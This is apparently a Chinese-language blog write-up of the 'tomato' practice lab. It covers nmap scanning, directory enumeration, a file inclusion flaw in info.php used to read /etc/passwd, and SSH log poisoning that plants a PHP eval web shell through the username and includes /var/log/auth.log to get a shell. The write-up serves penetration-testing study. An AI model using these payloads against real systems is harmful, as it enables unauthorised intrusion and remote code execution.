tomato 靶场

1.主机发现  扫描ip及端口

2.端口扫描 nmap192.168.233.131  有三个开放的端口nmap -sC -sV -O  192.168.233.131

-sC常见漏洞脚本扫描 -sV开放端口服务/版本号 -O操作系统探测

3.目录扫描

DIRECTORY: http://192.168.233.131/antibot_image/
+ http://192.168.233.131/index.html (CODE:200|SIZE:652)                     
+ http://192.168.233.131/server-status (CODE:403|SIZE:280)  

namp没全扫出来

4.访问192.168.233.131:8888 发现有个登录框 但是没啥子用

5.访问antibot_image目录 http://192.168.233.131/antibot_image/

继续访问一下antibots/目录 感觉这个跟爬虫的差不多

这个info.php

6.查看info.php的网页源码,发现存在文件包含漏洞

7.在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)

成功显示,说明存在文件包含漏洞

看这个发现端口没全部扫出来  再用这个扫一下nmap -A 192.168.233.131 -p-

-A: 这个选项启用了“侵略性扫描”,包括操作系统检测、版本检测、脚本扫描和跟踪路由等功能。侵略性扫描通常会提供更多的信息,但也可能引起目标系统的注意。

-p-: 这个选项告诉 nmap 扫描目标系统上的所有可能的端口。扫描所有端口可能会耗费一定的时间,但可以全面了解目标系统上开放的哪些端口,以及哪些端口可能存在漏洞。

还有个2211端口 可以ssh

ssh "<?php @eval($_POST['cmd']);?>"@192.168.233.131 -p 2211

然后在网页端查看ubuntu报错信息:/var/log/auth.log

/var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。

成功getshell
                        

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值